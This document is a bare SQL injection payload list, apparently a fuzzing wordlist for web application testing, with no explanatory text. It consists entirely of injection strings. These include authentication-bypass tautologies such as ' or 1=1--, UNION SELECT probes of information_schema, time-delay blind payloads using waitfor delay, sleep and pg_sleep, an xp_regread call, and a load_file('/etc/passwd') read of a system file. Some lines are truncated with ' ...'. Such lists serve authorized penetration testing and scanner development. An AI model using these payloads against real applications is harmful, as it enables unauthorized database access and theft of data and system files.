)%20or%20('x'='x
%20or%201=1
hi"""") or (""""a""""=""""a"""
delete
like
 or 0=0 #
insert
) or ('a'='a
; exec xp_regread
*|
a"""" or 3=3--"""
 or 0=0 --
1 waitfor delay '0:0:10'--
 or 'a'='a
hi or 1=1 --"
or a = a
 UNION ALL SELECT
hi' or 'a'='a
0
21%
limit
 or 1=1
 or 2 > 1
PRINT
hi') or ('a'='a
 or 3=3
or%201=1
or 1=1
 or '7659'='7659
 or 'text' = n'text'
 --
 or 1=1 or ''='
3.10E+17
x' AND email IS NULL; --
&
admin' or '
 or 'unusual' = 'unusual'
//
sqlvuln
or%201=1 --
or a=a
) union select * from information_schema.tables;
or isNULL(1/0) /*
26 %
 or ""a""=""a"
(sqlvuln)
x' AND members.email IS NULL; --
 or 1=1--
 and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
as
/**/or/**/1/**/=/**/1
 union all select @@version--
,@variable
(sqlattempt2)
 or (EXISTS)
%20or%20''='
hi' or 'x'='x';
) or sleep(__TIME__)=
 or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
 union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
 union select
 select * from information_schema.tables--
a' or 1=1--
a' or 'a' = 'a
declare @s varchar(22) select @s =
 or 2 between 1 and 3
 or a=a--
 or '1'='1
|
 or sleep(__TIME__)='
 or 1 --'
or 0=0 #"
having
a'
" or isNULL(1/0) /*
‘ or 1=1 --
char%4039%41%2b%40SELECT
 having 1=1--
 or username like char(37);
 or 1=1--"
x' AND userid IS NULL; --
*/*
 or 'text' > 't'
 (select top 1
a' or 3=3--
 -- &password=
 group by userid having 1=1--
 or ''='
%20or%20x=x
select
0x730065006c0065006300740020004000400076006500 ...
hi' or 1=1 --
%20or%20'x'='x
 or 'something' = 'some'+'thing'
exec sp
29 %
(
ý or 1=1 --
0 or 1=1
) or (a=a
 or 1=1 /*
)) or sleep(__TIME__)='
or 1=1 or ""=
 or 1 in (select @@version)--
sqlvuln;
 union select * from users where login = char ...
x' or 1=1 or 'x'='y
28%
‘ or 3=3 --
@variable
 or '1'='1'--
a" or 1=1--
//*
%2A%7C
" or 0=0 --
)) or pg_sleep(__TIME__)--"
?
 or 1/*
!
'
 or a = a
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
' or 0=0 --
' or 0=0 #
 or 0=0 #"
' or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
'hi' or 'x'='x';
or
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
<>"'%;)(&+
'%20or%201=1
'sqlattempt1
29%
26%
' or ''='
' or 3=3
' or 3=3 --